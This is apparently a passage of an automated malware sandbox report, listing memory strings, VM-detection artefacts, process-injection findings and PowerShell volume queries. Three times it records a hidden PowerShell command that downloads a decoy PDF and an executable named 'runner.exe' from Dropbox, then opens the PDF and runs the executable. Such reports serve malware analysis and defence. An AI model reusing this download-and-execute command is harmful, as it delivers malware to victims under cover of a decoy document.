Source: svchost.exe, 00000004.00000002.2922730335.000001FA56E54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.1858829268.000002394F061000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'Add-NetEventVmNetworkAdapter',
Source: Amcache.hve.2.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: Amcache.hve.2.dr	Binary or memory string: vmci.sys
Source: powershell.exe, 00000002.00000002.1858829268.000002394F061000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.2.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.2.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.2.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.2.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.2.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: powershell.exe, 00000002.00000002.1858829268.000002394F061000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin
Source: powershell.exe, 00000002.00000002.1918892718.0000023965CB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.2.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.2.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.2.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: powershell.exe, 00000002.00000002.1858829268.000002394F061000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapterX
Source: Amcache.hve.2.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: powershell.exe, 00000002.00000002.1858829268.000002394F061000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
Source: powershell.exe, 00000002.00000002.1921837609.0000023965E4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b};
Source: Amcache.hve.2.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: powershell.exe, 00000002.00000002.1919183779.0000023965CD3000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000003.00000002.1841912947.00000197E9E46000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.2.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.2.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: Amcache.hve.2.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: powershell.exe, 00000002.00000002.1858829268.000002394F061000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'Get-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000002.00000002.1858829268.000002394F061000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonly

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE"			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\996293227.pdf			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "$randompdf = \"$env:temp\$(get-random).pdf\"; $randomexe = \"$env:temp\$(get-random).exe\"; iwr -uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/lewis-silkin-llp.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -outfile $randompdf ; start-process msedge.exe -argumentlist \"--kiosk $randompdf\" ; iwr -uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -outfile $randomexe ; start $randomexe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "$randompdf = \"$env:temp\$(get-random).pdf\"; $randomexe = \"$env:temp\$(get-random).exe\"; iwr -uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/lewis-silkin-llp.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -outfile $randompdf ; start-process msedge.exe -argumentlist \"--kiosk $randompdf\" ; iwr -uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -outfile $randomexe ; start $randomexe"			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
